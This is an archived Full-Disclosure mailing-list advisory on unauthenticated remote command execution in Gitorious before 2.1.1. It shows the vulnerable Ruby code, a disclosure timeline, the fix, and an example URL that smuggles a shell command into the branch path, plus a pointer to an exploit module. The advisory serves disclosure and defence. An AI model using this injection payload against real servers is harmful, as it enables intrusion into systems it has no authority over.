[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Advisory: Remote Command Execution in Gitorious

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Advisory: Remote Command Execution in Gitorious
From: joernchen of Phenoelit <joernchen@xxxxxxxxxxxx>
Date: Fri, 27 Jan 2012 18:50:21 +0100

Hi,

FYI, see attached.

cheers,

joernchen
-- 
joernchen ~ Phenoelit
<joernchen@xxxxxxxxxxxx> ~ C776 3F67 7B95 03BF 5344
http://www.phenoelit.de  ~ A46A 7199 8B7B 756A F5AC

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--+->

[ Authors ]
        joernchen       <joernchen () phenoelit de>

        Phenoelit Group (http://www.phenoelit.de)

[ Affected Products ]
        Gitorious < 2.1.1 (http://gitorious.org)

[ Vendor communication ]
        2012-01-16 Asking vendor for PGP key
        2012-01-17 Getting PGP key from vendor
        2012-01-17 Sending vulnerability details to vendor
        2012-01-19 Vendor replies and sends link to patch [0]
        2012-01-19 Asking if users will be informed 
        2012-01-20 Vendor states that they will create a patch and let the
                   users know
        2012-01-25 Asking for a timeline for the notification
        2012-01-26 Vendor replies that patched branch is pushed and users 
                   are informed via a mailinglist.
        2012-01-27 Release of this advisory
        
[ Overview ]
        Gitorious is a Git repository management software written in Ruby 
        on Rails.

[ Description ]
        Gitorious has been found vulnerable to unauthenticated remote 
        command execution.

        Root cause is in gitorious-mainline/lib/gitorious/git_shell.rb:

        def execute(command)
          Timeout.timeout(20) do
           `#{command}`
        end
        rescue Timeout::Error

        called by app/controllers/api/graphs_controller.rb:

        def graph_log(repo, type, branch = nil)
          args = [repo.full_repository_path, "--decorate=full", "-100",
                  type]
          args << desplat_path(branch) if branch
          git_shell.send(:graph_log, *args)
        end

        where branch is user controlled via route:

        api.connect ':project_id/:repository_id/log/graph/*branch',
        :controller => 'graphs', :action => 'show'

[ Example ]
        http://gitorious.site/project/repo/log/graph/`id>/tmp/command_exec`

        For convenient use of this feature have a look at [1]

[ Solution ]
        Update to version 2.1.1

[ References ]
        [0] https://gitorious.org/gitorious/mainline/commit/
        647aed91a4dc72e88a27476948dfbacd5d0bf7ce
        [1] http://metasploit.com/modules/exploit/multi/http/gitorious_graph

[ end of file ]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [SECURITY] [DSA 2396-1] qemu-kvm security update
Next by Date: Re: [Full-disclosure] when did piracy/theft become expression of freedom
Previous by thread: [Full-disclosure] [SECURITY] [DSA 2396-1] qemu-kvm security update
Next by thread: [Full-disclosure] [ GLSA 201201-16 ] X.Org X Server/X Keyboard Configuration Database: Screen lock bypass
Index(es):
- Date
- Thread